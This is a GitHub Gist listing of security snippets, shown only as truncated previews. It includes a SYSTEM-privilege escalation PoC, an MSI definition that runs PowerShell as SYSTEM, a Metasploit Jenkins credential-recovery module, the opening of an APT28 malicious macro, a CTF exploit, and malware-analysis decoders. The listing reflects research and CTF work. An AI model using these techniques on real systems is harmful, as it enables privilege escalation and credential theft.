Skip to content

Instantly share code, notes, and snippets.

xpn xpn

View GitHub Profile
@xpn
xpn / getsystem_parent.cpp
Created Nov 20, 2017
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
View getsystem_parent.cpp
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
@xpn
xpn / msigen.wix
Created Nov 6, 2017
WIX file with embedded Powershell, which will be executed as SYSTEM
View msigen.wix
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
@xpn
xpn / jenkins_passwords.rb
Created Oct 15, 2017
Recover jenkins credentials in meterpreter
View jenkins_passwords.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'nokogiri'
require 'digest'
require 'openssl'
require 'base64'
@xpn
xpn / apt33_dropshot_decoder.py
Created Sep 20, 2017
IDAPython encrypted string decoder for DROPSHOT - APT33
View apt33_dropshot_decoder.py
import idc
import idaapi
from idautils import *
decryptTable = 0x41BA3C
decryptTableEnd = 0x41BA77
decryptFunction = 0x4012A0
# Get the translation table
bytes = idaapi.get_many_bytes(decryptTable, decryptTable-decryptTableEnd)
View APT28 Hospitality docm VBA
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Execute
@xpn
xpn / wannacry_file_extensions.txt
Created May 12, 2017
A list of file extensions searched and encrypted by the WannaCry ransomware
View wannacry_file_extensions.txt
.der
.pfx
.key
.crt
.csr
.p12
.pem
.odt
.ott
.sxw
View bigpicture-exploit.py
from pwn import *
import struct
WIDTH = 1
HEIGHT = 1000000
LOCAL = False
if LOCAL:
FREE_HOOK_OFFSET = -1230952
View bsidessf_ctf_dnscat2.py
from scapy.all import *
from scapy.utils import rdpcap
import sys
import struct
from pwn import *
MESSAGE_TYPE_SYN = 0x00
MESSAGE_TYPE_MSG = 0x1
MESSAGE_TYPE_PING = 0xFF
View alpha_mixed.py
# r2pipe script using ESIL to decode the msfvenom x86/alpha_mixed encoder
import r2pipe
import sys
def dump(addr):
pass
def startEsil():
r.cmd('e io.cache=true')
View pipe_jmp_call_additive.py
# r2pipe script using ESIL to decode the msfvenom jmp_call_additive XOR encoder
import r2pipe
import sys
def dump(addr):
pass
def startEsil():
r.cmd('e io.cache=true')
You can’t perform that action at this time.